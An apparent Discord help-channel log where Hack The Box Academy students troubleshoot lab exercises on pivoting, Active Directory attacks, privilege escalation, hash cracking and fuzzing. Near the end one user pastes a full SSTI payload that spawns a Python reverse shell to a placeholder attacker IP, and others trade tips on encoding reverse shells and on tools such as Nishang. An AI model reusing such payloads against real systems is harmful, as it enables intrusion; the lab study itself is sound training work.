#modules
Hi guys, for AD enumeration, do the credentials captured by Inveigh depend on what machine you run it on, assuming that the machines are in the same internal network?
PIVOTING, TUNNELING, AND PORT FORWARDING: Skills Assessment
Question:
Enumerate the internal network and discover another active host. Submit the IP address of that host as the answer.
What I have done
Accessed the webshell and found the username (mXXXX) and password, copied and pasted id_rsa (mget/get doesn't work) and did chmod 600 on it
When I run 'ssh mXXXX@IP -i id_rsa' and enter the password I can't log in over ssh
Can anyone help me? What am I doing wrong?
yes it can
Can you explain why?
cause it's only listening to traffic, but if the traffic isn't being sent to the machine you're listening on you're not gonna hear anything
so it can vary depending on exactly why the traffic is being created in the first place
I see. Thanks
if your targets are docker containers which use a public ip then you can't scan or ping them, but if your targets are just local vms then some of them could have a firewall enabled which blocks icmp
No, it's a local vm, can't connect to rdp
i have been having rdp issues since yesterday too
even now i tried to rdp ... got in, then after a few seconds it fails on the pwnbox
It was working fine a few hours ago
this is for the Active Directory Enumeration & Attacks - Living Off the Land
I am on password attack pass the ticket
well no idea what to say ... i even rebooted my linux but from my vm it says failed then from pwnbox i got in but after a short while it fails
HTB has been having some issues recently because a back end hosting provider yeeted themselves out, so there were some issues for targets on both platforms for the last few days
Nothing works for me
any idea when this would be likely resolved
if it's a back end issue there is nothing we can do
but i haven't got this issue so far
i have been stuck on the same section since yesterday
but y'all can do common stuff like make sure your vpn and the pwnbox aren't both on at the same time and changing vpn
linux privesc shell assessment last question. ran linux-exploit-suggester and tried a couple but no luck, primarily with no access to gcc? any ideas/hints?
if it persists later during the day then probably i will download a new vpn key
I change the VPN, reset the labs, nothing changed
I tried it too
again if it's an internal HTB issue there isn't much we can do to fix this
i do remember there was an ssh key in that assessment but you should be able to find and use that user's password for ssh
well i guess it's time to go and touch grass until this is over
Found that also and used it
It says access denied
i guess ssh dynamic port forwarding is the easiest thing you can do for pivoting but if you got a shell you can just use that to continue pivoting
for the last flag you'll need to be the user that got the fourth flag
yeah in meterpreter with that atm @vital adder but f all commands can be used. trying to figure it out but just getting command not found constantly
pls don't tell me you are running your command in the meterpreter shell? 🤣
in the meterpreter shell run shell to drop into a linux shell on the target
or not sure if this will work but you can use shell -t for a pty shell
omfg
lol
i tried it before but maybe derped? i dunno but dropping into shell now ty
@limber river @iron plaza quick question did you guys use xfreerdp for rdping into the target machines? if yes then did you guys get this error? transport_check_fds: transport->ReceiveCallback() - -1
No, it seems like it's working now
i was wondering if that was the issue because that's a tls error and adding the /tls-seclevel:0 tag will fix it
edit: wait nope i don't think that's a tls error but not sure 🤷♂️
It works for seconds
i got this error on pwnbox:
```
[03:37:44:505] [2627:2628] [ERROR][com.freerdp.core.transport] - BIO_should_retry returned a system error 104: Connection reset by peer
[03:37:44:505] [2627:2628] [ERROR][com.freerdp.core] - transport_write:freerdp_set_last_error_ex ERRCONNECT_CONNECT_TRANSPORT_FAILED [0x0002000D]
[03:37:44:505] [2627:2628] [ERROR][com.freerdp.core.transport] - NLA begin failed
[03:37:46:529] [2627:2628] [INFO][com.freerdp.gdi] - Local framebuffer format PIXEL_FORMAT_BGRX32
[03:37:46:529] [2627:2628] [INFO][com.freerdp.gdi] - Remote framebuffer format PIXEL_FORMAT_BGRA32
[03:37:46:544] [2627:2628] [INFO][com.freerdp.channels.rdpsnd.client] - [static] Loaded fake backend for rdpsnd
[03:37:46:544] [2627:2628] [INFO][com.freerdp.channels.drdynvc.client] - Loading Dynamic Virtual Channel rdpgfx
[03:37:58:082] [2627:2628] [INFO][com.freerdp.client.x11] - Logon Error Info LOGON_FAILED_OTHER [LOGON_MSG_SESSION_CONTINUE]
[03:38:11:916] [2627:2628] [ERROR][com.freerdp.core.transport] - BIO_read returned a system error 110: Connection timed out
[03:38:11:916] [2627:2628] [ERROR][com.freerdp.core] - transport_read_layer:freerdp_set_last_error_ex ERRCONNECT_CONNECT_TRANSPORT_FAILED [0x0002000D]
[03:38:11:916] [2627:2628] [INFO][com.freerdp.client.common] - Network disconnect!
```
And it went down again
Are you sure it’s mXXXX
I had a different username
the pwnbox was working for me, also your error is all over the place: a timeout, login, transport layer error
I found it in webadmin
||cat for-admin-eyes-only|| in this i found
that's what i got right after the login
MY GOD
Where i am going..
yeah if the error is persistent for multiple users then most likely this is an internal error
we can't do anything, seems I will sleep early today lol
Oh yeah I understand now
You need to ssh as ||webadmin||, the credentials you found are for the next step and are not a user on the web server
well i woke up to this and now i am forced to go out
AHHHH...
Got confused again....
Thanks ..
it's good to take a rest from time to time
i want to get over it cause i hate windows as an OS ... the longer i take the more hair i lose
I am connected now, hope it's not going down again
can someone please explain what's happening here?
Lemme check my notes
The hash you pass in as the user password is encrypted with aes256, however the TGS ticket Rubeus requested is encrypted in RC4 since it's easier to crack
It's a pass the ticket no
Those are kerberos keys
Not passwords
And they are encrypted in aes 256 mode
But idk what that "using rc4" in the output of the command refers to
isn't asktgt module used to request tickets by passing in the user creds?
Can someone explain
I took this screenshot from the section, they use aes to forge the ticket but the rubeus output shows rc4?
To forge a ticket using Rubeus, we can use the module asktgt with the username, domain, and hash which can be /rc4, /aes128, /aes256, or /des.
quoted from the section
from what I understand, the aes256 hash passed in is the password hash for the user's plaintext, used to request a ticket, and the password hashing algorithm has nothing to do with the ticket hashing algorithm
also it won't pass the ticket unless /ptt is specified
idts, cuz the rc4 hash is the exact hash I found next to the aes hash when I dumped the hashes
so basically it's the same hash encoded with two different algorithms, but why does rubeus show rc4 in the output when we give it aes
i might know what u mean
I mean if the password hashing algorithm has nothing to do with ticket hashing, why do they use the same password one time with an rc4 hash and the other with aes
Thank you
lol mb for the wrong answer
No, it's all about discussing different ideas
thx
Hello everybody, I'm stuck in linux privilege escalation --> logrotate, i found the log file and i'm trying to execute the exploit but it's stuck here: Waiting for rotating /home/file.log
the file is different but i don't show it because of server rules

Finally
I just got it thanks to your tip, thank you!
Now going to start the module which scares me the most
Windows Active Directory: The jumbo module 
could somebody help with linux privilege escalation, logrotate?
Please i'm stuck here for 4 days
and then Active Directory Enumeration & Attacks :D
Yeah... 😆

Hi! I'm in the ffuf module trying to do the lab but my vm network is crashing every time I use ffuf
Any ideas why this is happening?
Probably your isp rate limiting
Hello somebody could help with linux privilege escalation, logrotate?
And what should I do to avoid that? The other day everything worked perfectly but today I am trying by lan, wifi and connecting to my phone, but every time the vpn crashes, throwing me the error "no route to host"
Well if it's a vpn issue, try switching from udp -> tcp vpn config
the main access point for main control access points were in the main access pointers were in the cordic central serever to save
Go home, you're drunk
Hi guys, I'm doing the file upload section and I have a problem in the blacklist filter section. I get a 403 Forbidden error on the file. Is that ok or should I try something else
i'm stuck on it for days now lol
I used the upload function on all the php extensions, with the following body
you have a list of extensions right?
Why would you even need to fuzz this ? xD
did you do the module?
I tried to upload a webshell file with each of the extensions, then I requested it via the /profile_images/ path.
ok i'll try to find my mistake
ahh sorry
@tough fjord @burnt stone @spring tundra
It’s dealt with already
k sry
But you can ping SERIOUS RULE BREAK when something like that happens, at least that’s what I do
Yes, please do that next time ^

Now could somebody please help me with the linux privesc, logrotate module?
I'm stuck here for 4 days..
What are you stuck with? I’ve just completed it
i found the log file but when i try to execute the exploit i get this
Waiting for rotating /home/file.log
it never executes, it's just waiting....
I’m going to PM you mate, 1 sec
Thanks bro!
Hello everyone, I need help on the last two questions of AD Enumeration & Attacks - Skills Assessment Part II
I got ||CT***|| creds and I know that this user has GenericAll, I have tried to do port forwarding using chisel to use proxychains rdp and evil-winrm but it doesn't work
https://academy.hackthebox.com/module/143/section/1279
Hey, can someone help me with the last question on Active Directory Enumeration & Attacks, Section: Living Off the Land
what is the ip of the machine that you are trying to rdp to?
what are you using to get the user?
Howdy
Hi, could someone help me, I am a bit stuck on "Active Directory Enumeration and Attacks - Privilege Access" - Q2: What host can this user access via WinRM? (just the computer name)
did you run bloodhound and the cypher query from the example?
I have run the query but I am not sure what the computer name is
the query gives u only 1 result and it is the name of the computer
if the name is example.inlanefreight.local the name of the computer will be "example"
when I put that name in it says that it is the wrong name
what name are u putting?
I sent a private message
okay
can i dm you?
172.16.7.3
The worst thing in life:
Hey, can someone help me with the last question on Active Directory Enumeration & Attacks, Section: Living Off the Land
Ask your question more specifically. No one can help you otherwise
yes sry, i got it
Good stuff
anyone else having an issue with boxes repeatedly going down?
trying to do the pivoting module but the spawned boxes continuously go down
had that issue since yesterday and it resolves time to time (gotta be on the lab at the right time sort of thing)... was told it is an internal issue that is being solved
yeah, i'm just unable to finish a question because i cannot proxy to a webserver in time before the machine just dies
mod: Active Subdomain Enumeration, q: Find and submit the contents of the TXT record as the answer. did `dig TXT inlanefreight.htb @10.129.91.90`, not working, any hints?
Try to change the admin's email to 'flag@idor.htb', and you should get the flag on the 'edit profile' page.
go brute force subdomains. Use seclists, more than one
that's a pain fs, ok thanks tho
getting the same results as it gave me previously with axfr
and none giving me the TXT record
In the Linux fundamentals Module section file system management. I have a problem.
Question: What is the size in GiB of the "/dev/VDA" Disk in our Pwnbox? (Format: 000)
When I run the command sudo fdisk -l the output is
160 is wrong. What am I doing wrong.
go through the dns section of the footprinting module again
how’d you format your answer?
"160", the format is "000". Is there an error???
i assume you didn’t put the quotation marks?
also be sure to remove the answer from this chat so you don’t spoil others
I only put the quotation marks to show my answer and the format.
With quotation marks it's even more wrong.
should be without
160 is wrong. I asked why. Forget the quotation marks, I only typed them here to show the format.
When cracking an NTLMv2 hash, which part of the hash do i need?
When the roaming disk goes suade, the files command another brick in the system
following the thread moreover
The last one
thanks for your help so i'm doing it right but i'm having issues with hashcat
but for some reason i'm getting this error message in hashcat
why did you cut up the hash?
those fields are necessary
yes, you need the entire hash
thanks
The power-stations of the hash, and the codec numerics, are all faintly a square number in the map system.
so, the hash has commands for utlity problematics, and the sense of that is an illsit command.-
My bad sorry...
I just mixed up another thing
Cracked the hash????
script kiddies unite
would have been better to put the hash between spoiler tags 😅
Writing on my own))
I didn't know that knowing how to move the mouse is a skill, lol
Trust me... it is
400 dpi
== skill
You did not play CSGO?
Lmao no
That's great
Congratulations on not wasting 500+ hours
Can someone help out with a question in the Intro to Network Traffic Analysis module? I've input the expected answer but it is not being accepted by the question form and neither are any of its variations 🙂
Hey, anyone have an idea why PowerSploit isn't importing all commands on Windows 11? The only commands getting imported by Get-Command -Module PowerSploit are: {Get-ComputerDetail, Get-HttpStatus, Invoke-ReverseDnsLookup}. Already bypassed AMSI and tried to move the module to the $env:PSModulePath
Systeminfo:
```
OS Name: Microsoft Windows 11 Pro
OS Version: 10.0.22000 N/A Build 22000
OS Manufacturer: Microsoft Corporation
OS Configuration: Member Workstation
OS Build Type: Multiprocessor Free
Registered Owner: htb-student
```
Frustrating
I waste more on useless stuff xD
LOL hahahah at least you are aware of that
Too late....
creds don't seem to work in the AD LDAP module for the LDAP overview section
BROKEN AUTHENTICATION: Using rockyou-50.txt as password wordlist and htbuser as the username, find the policy and filter out strings that don't respect it. What is the valid password for the htbuser account?
https://academy.hackthebox.com/module/80/section/777
||I already found the password list, but I can't seem to find a way to bypass rate-limiting. I tried looking for an option in wfuzz or ffuf that delays the request by n seconds but I couldn't find one. ||
Use the rate_limit_check.py
It comes with the module
@limber river dude sent you a dm if you don't mind
I used it but nothing showed up
So maybe you missed something in the policies
I already solved the question by brute forcing the answer box manually but I wanna understand how to deal with rate limiting properly
the answer is already in the list found
I'll try it again and check if I missed something in the code
How many passwords did you get after applying the policies
@acoustic owl any help
Please
What exactly is not working?
How can he brute force the password after finding the customized wordlist
So either with a script, or manually, because after 3 or 4 attempts, access is blocked for a few seconds.
He managed to do it manually
How could it be done with a script? I can't remember what I have done
@acoustic owl I solved it manually but I couldn't do it with the script for some reason.
You can build your script to try a password every 20 or 30 seconds
Can I pm you?
In python you can use sleep
```python
import time
time.sleep(20)
```
sure
I'll try that. thanks
shouldn't I receive an icmp trace every minute?
it's not working
i mean it works but what is wrong with my scheduled task then
which module and section are you on?
how can i copy a command in pwnbox?
INTRODUCTION TO WINDOWS COMMAND LINE / Working With Scheduled Tasks
welp my notes for that and a few more sections in that module are F'd up for some reason so give me a sec i'll double check
either enable copy or there is a copy bubble that you can use when in full screen
oh thanks i didn't see the bubble
ok fixed
Logon Mode: Interactive/Background
so you need creds to create background scheduled tasks
i have a problem in the Footprinting module, MSSQL section, when i run this script it says to debug it and i don't know what to do
it's the same nmap scan as shown in the section, i just changed the ip
i tried but i get nothing interesting, just a bunch of errors
that's what a debug consists of
yea i know
also the parameter should be mssql.instance-name
or is that a dash? i see a point let me open screenshot
maybe the instance name is not MSSQLSERVER?
it's a dot
```
sudo nmap --script ms-sql-info,ms-sql-empty-password,ms-sql-xp-cmdshell,ms-sql-config,ms-sql-ntlm-info,ms-sql-tables,ms-sql-hasdbaccess,ms-sql-dac,ms-sql-dump-hashes --script-args mssql.instance-port=1433,mssql.instance-name=MSSQLSERVER -sV -p 1433 10.129.148.111
```
it would be weird but maybe you're right
i haven't gone through that module but the syntax is correct
i'll try with metasploit if i can do the host enum
what if you try to enumerate the instance name?
```
nmap -p 1433 --script ms-sql-info --script-args mssql.instance-port=1433 <host>
```
it just says host is up but nothing else, i'll try something else later, i've been doing this for too long
thanks
you’re to use the same command provided in the module
it's not working
i did find the answer with metasploit anyway but nmap script doesn't work
got it with nmap 7.92
they changed something in nmap 7.93
yea i have 7.93
yea i downgraded it in the pwnbox XD
```
sudo apt remove nmap --purge
sudo apt install nmap=7.92+dfsg1-2parrot1 nmap-common=7.92+dfsg1-2parrot1
```
maybe an erratum would be good?
i did it
nice, we can go on now
Describe the bug The ms-sql-info NSE script fails to run: Starting Nmap 7.93 ( https://nmap.org ) at 2023-03-15 10:50 CET Nmap scan report for localhost (127.0.0.1) Host is up (0.000078s latency). ...
this is the issue
update to 7.94 or downgrade to 7.92
nvm it's not fixed in 7.94, but there are 2 workarounds:
Hey everyone, I'm new to the pentesting path and would love some help if anyone has time/interest. I'm a bit stuck on the nmap module's "Host and Port Scanning" section. The question I'm stuck on is asking to "Enumerate the hostname of your target and submit it as the answer (case-sensitive)".
I've scanned the target and found a few services responding but I'm coming up short on ideas for how to enumerate the hostname given the lack of a DNS server with usable PTR records. The module doesn't mention anything about hostname enumeration techniques so I did some digging online but haven't found anything to unblock me. I tried scanning the entire /24 to see if there might be another host on that subnet I could point nmap to for usable PTR records but only found my target host being up.
Is there an nmap script I'm not aware of I should be trying or some other tip to point me in the right direction? Everything I've found online says if you don't have a DNS server with a PTR record there's no magic nmap will provide to enumerate a hostname for you.
Thanks in advance to anyone that can help me out with pointers (not looking for answers unless the question is actually unsolvable in its current state...)
which OS is your target running? you can know it based on the TTL
if it's asking about the hostname i suppose it's a Win machine
hostname can be found in protocols like SMB
when you say "found in protocols" how so?
I'm still really early in the course so the number of tools in my toolkit is currently quite limited 😅
you should follow the path recommendations
and do information security foundations path before
I'm following exactly the prescribed order of modules in the course
I got it sorted, thanks for the....stellar advice... @sly dome
It depends
the content is just too dense for a beginner
Beginner can mean different things in context too
I agree
I'd say if you've never had any experience with command line or Linux: infosec foundations definitely is a better start
in my opinion the problematic OS is Windows
Shell
Exactly 🙃
Linux is 100x easier to understand xd
Me at this moment
HAHAHA
i have little experience in Pentesting and i'm learning things in the infosec foundations path
i'm doing the PayloadBunny track
infosec foundations -> python -> cbbh path -> cpts path
i'm experienced at Python tho
Really, but you need some foundation
just gonna do it for fun
its a short module
you need Python definitely for Pentesting imho
Python more if you're planning to do cbbh probably
Not really. Unless you're custom crafting scripts
i just want to know why cbbh before cpts
web pentesting is huge
Cbbh expands more on some of the web techniques in the modules that can help
very powerful skill
I want to finish the cpts, i'm already half way
any sql injection i've done is through a Python script
a scripting language is essential 🤷🏻♂️
hi guys i'm stuck on this last question in password attacks, for the last 6 days
mad to get over the slump. it's the last question in pass the ticket, i can't seem to log in as linux01 and get the flag in smb
first, when importing the keytab file only use LINUX01$ without the @domain.htb, and if you do it right, when running klist you should see the linux01 ticket
*info
thanks i'll give it a shot now
Hi could anyone point out what's wrong in this?
```
ffuf -w /opt/useful/SecLists/Discovery/DNS/subdomains-top1million-5000.txt:FUZZ -u http://academy.htb:36515/ -H 'Host: FUZZ.academy.htb'
```
thank you kindly my good sir
if you add the docker target public ip without the port to your hosts file then nothing is wrong
also next time pls add what module and section you are doing, what you tried, what worked or didn't work, pls don't send your command without any context and ask what's wrong with it
At the latest when it comes to customizing scripts, probably even before (Broken Authentication) you will think about the Python module 😉
hey guys where can i download the wordlists for the modules
every time i have pain with this
now i'm doing the
```
File Inclusion
Page 4
PHP Filters
```
module and i can't find a wordlist for it
Hello everyone, I'm in the windows Privesc module, Communication with Processes, when i use accesschk it works but when i use it again right after it doesn't work, what is happening here?
```
Accesschk v6.15 - Reports effective permissions for securable objects
Copyright (C) 2006-2022 Mark Russinovich
Sysinternals - www.sysinternals.com

\\.\Pipe\lsass
  Untrusted Mandatory Level [No-Write-Up]
  RW Everyone
        FILE_READ_ATTRIBUTES
        FILE_READ_DATA
        FILE_READ_EA
        FILE_WRITE_ATTRIBUTES
        FILE_WRITE_DATA
        FILE_WRITE_EA
        SYNCHRONIZE
        READ_CONTROL
  RW NT AUTHORITY\ANONYMOUS LOGON
        FILE_READ_ATTRIBUTES
        FILE_READ_DATA
        FILE_READ_EA
        FILE_WRITE_ATTRIBUTES
        FILE_WRITE_DATA
        FILE_WRITE_EA
        SYNCHRONIZE
        READ_CONTROL
  RW APPLICATION PACKAGE AUTHORITY\Your Windows credentials
        FILE_READ_ATTRIBUTES
        FILE_READ_DATA
        FILE_READ_EA
        FILE_WRITE_ATTRIBUTES
        FILE_WRITE_DATA
        FILE_WRITE_EA
        SYNCHRONIZE
        READ_CONTROL
  RW BUILTIN\Administrators
        FILE_ALL_ACCESS

PS C:\Users\htb-student\Desktop> .\access.exe /accepteula \\.\Pipe\lsass -v

Accesschk v6.15 - Reports effective permissions for securable objects
Copyright (C) 2006-2022 Mark Russinovich
Sysinternals - www.sysinternals.com

\\.\Pipe\lsass
  Error getting security:
  All pipe instances are busy.

No matching objects found.
PS C:\Users\htb-student\Desktop>
```
can anyone help ?
<@&861185840277487616>
what
i want someone
please
what did i miss?
the user @rustic sage is asking illegal questions
he wants to hack a discord account
my guess is when you ran it the second time the LSASS pipe was in use by a different process or something along those lines
the classic but i mean if you are bored you can troll them for a bit
WTF how can i know if i can run accesschk?
accesschk itself is for checking the permissions so you don't know when you can or can't run it, you have to run it to know
there is no wordlist for you to download in the LFI module
but if there are wordlists for you to download in a module you can get them under Resources
what am i doing wrong?
```
Accesschk v6.15 - Reports effective permissions for securable objects
Copyright (C) 2006-2022 Mark Russinovich
Sysinternals - www.sysinternals.com
\\.\pipe\SQLLocal\SQLEXPRESS01
  Error getting security:
  All pipe instances are busy.

No matching objects found.
PS C:\Users\htb-student\Desktop> gci \\.\pipe\

    Directory: \\.\pipe\SQLLocal

Mode                 LastWriteTime         Length Name
----                 -------------         ------ ----
------          12/31/1600   4:00 PM              3 SQLLocal\SQLEXPRESS01
```
just realized my educated guess was kinda right because if you read the error it's All pipe instances are busy, so maybe run it again 🤣
or try `C:\Tools\AccessChk\accesschk.exe /accepteula \pipe\SQLLocal\SQLEXPRESS01 -v`
got it!
my problem is in the path
it's `C:\Tools\AccessChk\accesschk.exe /accepteula \pipe\SQLLocal\SQLEXPRESS01 -v`
and i was using
`\.\pipe\SQLLocal\SQLEXPRESS01`
i have a question for the footprinting module, Oracle section, i found the answer ||but i'm curious why i can't use where to select only the user asked about in the question: select name, password from sys.user$ where name=DBSNMP; it responds with invalid identifier||
did you try using quotes?
i just tried and it doesn't work either
it's case sensitive i think
where are the resources?
there are none for the module that you're on, but for the modules that have wordlists it's right here
nothing for me
where i can find a good wordlist ?
again there are no wordlists in your module
ye
it depends on what you need
99% of the wordlists shown in any section are on the pwnbox
or from the name you can just download it yourself
which section?
this one
i don't know how and why but it works if i do it in single quotes
use a common wordlist adding .php
the wordlist is directory-list-2.3-small.txt from SecLists, just read the example command
you need to fuzz with php extension
that's the File Inclusion module, PHP Filters section, you sure you got the right module and section? or if you mean the very first command then that one is for finding index.php 🤣 (they ended up not using the other one)
i am answering according to this
🤦♂️ maybe i got something mixed on my end but dono 🤷♂️
edit: forgot the command in my note isn't in the example, but you don't need to fuzz for extensions on this one
😅
i'm just a little bad at finding wordlists
thanks
the newly landed spacials for text commands has an utility
so, the deducted verse has two or more scratch-volcubarity in the screen command files, as they shred to a new document address
so, the link has deduction
bro?
can't we still use another user's userId to get privileges
Can someone please DM me for help with AD skills lab part 2, this is my third day on this and I'm going crazy
how can i reach support
can you show us the exact command that you're running?
DM
I am on the medium password cracking lab and have gotten into a user account. I am having trouble with enumerating the root password. I see a second user that has bash history, but I don't have that password. Any hints on where to look next?
if we are targeting an mssql server from linux we use sqsh
lowest hanging fruit is to see if you can cat /etc/shadow
odds are you can't, but that'll be the easiest way if you can
can't cat shadow
next thing to do is to look through config files for whatever services the box is running
I found root password in a box I did yesterday inside a php config file
I would honestly just go through standard priv esc stuff. Is this a linux box?
I assume so since you tried to cat /etc/shadow, but just wanna confirm
If it is, see if you can do sudo su with no password, do sudo -l (gives you a list of applications the current user has sudo permissions for)
do find / -perm u=s -type f 2>/dev/null
look for suid bit set
there's a whole slew of things to try!
just a fun fact, the eu academy vpn permanently disconnects while na is working for me
in case anyone had similar issues
only root and whoever is in the "shadow" group can read the file
/etc/passwd
Sure, that should be checked too, although it's a bit infrequent to find password hashes there
definitely, sorry I didn't follow from the beginning, but if he can't read the "shadow" file he probably doesn't have enough permissions
Mhm. Just checking it anyway. Gotta make sure to cross our t's and dot our i's
Does anyone know if there is a known issue with the Reverse Shells module under Shells & Payloads course? Keeps disconnecting making it hard to trial and error the payload. 😦 I got the answer to the question, and luckily understand the concept. Just was hoping to connect and get it "proper".
on the impacket line, I used -windows-auth
Can't recall why, but I'm pretty sure I researched it at the time.
Currently on attacking common services: SMTP. I've obtained creds for the user but I'm struggling to use them to get the user's email messages and in turn the flag. All help appreciated
it is linux
I prefer to cross my eyes and dot my tees
yup still sucking at this. Tried linpeas, some other priv esc and now i'm looking to crack the other user's pass remotely with a mutated password list. Dunno
what's the output of find / -perm u=s -type f 2>/dev/null
i suggest improving your fundamentals
@acoustic owl do you know why
Which module are we talking about?
Why other users claim anything, I cannot judge, sorry
attacking common services sql
mssqlclient works better for me on that one than sqsh
you def don't have to use windows though
which module are you talking about?
AD Enum & Attack?
If I remember correctly, you found the user in the previous sections
forend should work
Hi, in SQLMAP - skills assessment, sqlmap returns a syntax error for any non trivial id value, no matter which tamper script I try.
Could I get some help ?
i can help, dm
does anyone know why when i do curl -X POST ip -d key=text i get the flag, but when i do the request from Burpsuite i don't get the right flag, with exactly the same request? it returns me the text that it returns without any data. But i put the data in the body, in the same type as i do with curl. Any tip?
show your burp request
i've been here 90 minutes and i can't figure it out
is it something obvious?
i thought maybe it's the content-type but still couldn't figure it out
ur using : in burp and = with curl?
i fixed it
jesus this thing. i did a -vvv. Content-Type: application/x-www-form-urlencoded was the right one, it needed the application part. Thanks for the fast responses anyways! ❤️
was gonna say that
u can proxy your curl through burp and see the differences between the request made by curl and the request you were trying to send
but anyways cheers it works now
still very very noob to these concepts, that's why i didn't think of it. thanks for the help
you try it if you want, add --proxy http://127.0.0.1:8080 to the end of the curl command you were using and watch Proxy -> HTTP History in Burp or just intercept, also np
thanks a lot
how can nmap do a udp scan? as far as i know udp doesn't send any response unlike tcp
Nmap can do udp scans if you give it the flag, if that is your question. It ignores tcp
Wrong channel mate. Read #welcome
no i mean tcp ports if it get the syn packet it send syn-ack packet and my device will know the port is open
but in udp if get and packet do not send any response
so how nmap can make udp scan
It will do a 3 way handshake if I'm not mistaken for TCP
ok in udp what will it do?
best diagram I can find
If it doesn't make sense, I would look more into it and understand. Especially if you are doing packet analysis in SOC or gov work
but how? to my knowledge udp doesn't get any response
Can someone help with the Command Injections module and bypassing blacklists?
yeah if the port doesn't respond to the packet it means that the port is open
UDP Probe: Nmap sends a UDP packet to each target port. For some common ports, the packet contains a protocol-specific payload that is likely to generate a response.
Open Port: No response is received.
Closed Port: An ICMP port unreachable error is received.
i hope it helps
UDP does in fact get a response. Online games use UDP. When you lag, it’s because the client device hasn’t yet received a response from the server
It means that the port is open
Hi there! I need a little nudge on the Session Security - Skills Assessment module.
Update: Turns out I was doing almost the right thing all along and overcomplicating it.
cool
maybe you have to try something on the endpoint
where can i get walkthrough for OOPArtDB web challenge
read #welcome and #rules after that use /verify at #bot-commands and ask that at #challenges but there is no walkthrough or write up for active boxes or challenges
do you solve that box
that is not a box nor is this the right place to ask that
Hello everyone, i have a question, i'm in a powershell/cmd session, how can i know if i have administrative permissions?
One way would be to see if your current user is in the "administrators" group: net user <username> and check the "Local Group Memberships"
I don't see it
```
User name htb-student
Full Name
Comment
User's comment
Country/region code 000 (System Default)
Account active Yes
Account expires Never
Password last set 6/10/2021 10:41:20 AM
Password expires Never
Password changeable 6/10/2021 10:41:20 AM
Password required Yes
User may change password Yes
Workstations allowed All
Logon script
User profile
Home directory
Last logon 9/20/2023 2:22:09 AM
Logon hours allowed All
Local Group Memberships *Remote Desktop Users *Users
Global Group memberships *None
The command completed successfully.
PS C:\Windows\system32>
```
in Local Group Memberships it shows Users but not Administrators, but i have administrator rights
to check you could even try to open an elevated prompt, if you are asking me if there is a precise way of doing it then we have to wait for someone else or google a bit
i have an elevated prompt, my question is how can i know this?
i use this but i have :False
if you execute net session what is the output?
can you go inside the administrator directory?
the first image is with an elevated prompt, the second with a normal prompt, i don't understand what is happening
I guess it is the UAC
```
Path
----
C:\Users\Administrator
PS C:\Users\Administrator> dir
dir : Access to the path 'C:\Users\Administrator' is denied.
At line:1 char:1
+ dir
+ ~~~
+ CategoryInfo : PermissionDenied: (C:\Users\Administrator:String) [Get-ChildItem], UnauthorizedAccessException
+ FullyQualifiedErrorId : DirUnauthorizedAccessError,Microsoft.PowerShell.Commands.GetChildItemCommand
PS C:\Users\Administrator>
```
can you give me an explanation, please?
ahhhh
how can i know if i have an administrator access token in my powershell session?
i'm executing this but nothing happens
PS C:\>
@rustic sage you don't have administrative privileges
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
============================= ======================================== ========
SeTakeOwnershipPrivilege Take ownership of files or other objects Disabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Disabled
PS C:\>
PS C:\> whoami /priv
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
============================= ============================== ========
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Disabled
PS C:\>
I'm the same user, first with an elevated prompt, second with a normal prompt, how can i know if i'm in an elevated prompt?
WHAT IS HAPPENING HERE???
You don't have administrator privileges
Ok, but why in the first i have 3 privileges and the second i have 2? what is happening ?
@rustic sage it does not change anything bro use net user username to change if you have administrator access
If you can't run powershell as administrator it means your account has no administrative privileges
i run it
and when i run it as admin i have 3 privileges, when i run it normally i have 2
can i write you a message in private? @placid quest
Ok
Hi guys, i'm on the hard Password Attacks assessment, can't seem to get a handle on how to find David's credentials. any chance of a hand?
I got in to rdp with johanna
Wait lemme check my notes
U are on the rdp right
Try to enumerate everything in the target
Something useful
Its in front of you just keep looking
can i pm you
WINDOWS EVENT LOGS & FINDING EVIL - Skills Assessment - any help please? i've been stuck for a while now. i was not able to solve the first question.
Yeah sure
Hey everyone!
I have a question regarding SSTI "Exploitation Example 3":
Could anyone tell me why none of the reverse shells seem to work? I always get the error 500.
I have a hunch that I'm encoding it wrong, but don't know how to do it.
I already got the flag, but don't want to skip getting the rev shell too...
That's how I've encoded it
And this is the original payload:
{{''.__class__.__mro__[1].__subclasses__()[214]()._module.__builtins__['__import__']('os').popen('python -c \'socket=__import__("socket");os=__import__("os");pty=__import__("pty");s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("<PENTESTER_IP>",<PENTESTER_PORT>));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);pty.spawn("/bin/sh")\'').read()}}
did you test RCE with a simpler payload
@sly dome Yeah, it works with single commands like "id" "ls" and so on. But I can't manage to get a rev shell. I also tried some bash rev shells instead of python and it also doesn't work
can you ping yourself?
if you can ping then try to check if tcp traffic is working, set up a Python http listener on your side and try to wget/curl it
if tcp traffic is working just keep trying shells, use base64 and in SSTI i like to url-encode ALL characters
Thanks for the tips! Both ping and tcp traffic are working, so I'll keep trying to encode the payload differently! Tried the all-character encoding too already, but it didn't work unfortunately
quotes usually make it difficult, use base64
Hey RafaJurado, quick question about the revshells website. If I want a shell to pop from a powershell to a powershell, do I have to select powershell down in the shell selector?
@sly dome
use Nishang
and you will have to setup a listener on the other PS session
something that is widely documented online
You're saying that nishang is better to do powershell revshell than the website revshells ?
It looks like nishang mainly proposes the antak webshell
or you can try hoaxshell, the powershell revshell on that site (revshells.com) never works for me btw
Well, it just worked after a few hours and a reset... But I still can't know why it didn't work before
Thanks for the info !
there should be other example payloads in that section, try a different payload and you should be able to get RCE and read the flag without a shell
in my experience nishang reverse has never failed
also it has reverse using ICMP protocol for situations where outbound tcp traffic is not allowed
Well, after some examination, the powershell converted to b64 from revshells.com didn't work because the b64 added a space before my IP...
remember powershell works in utf-16
you need to convert from utf8 to utf16 then to base64
but you said from powershell to powershell, why do you need encoding here?
Well it was for the pass the ticket of the password attack module
Well it was for the pass the hash of the password attack module
You had to use a hash to execute a powershell script from another target in the domain
By the way, if I can ask a quick question, does anyone really take 8 hours to finish the password attacks module? It took me about 14 hours and I still didn't finish.
The time scheduled by Hack The Box Academy always seems to be divided by 2 or 3
it really depends on the individual
introduction to windows command line is scheduled for 4 days and it took me ~12 hours
because i had background before starting it
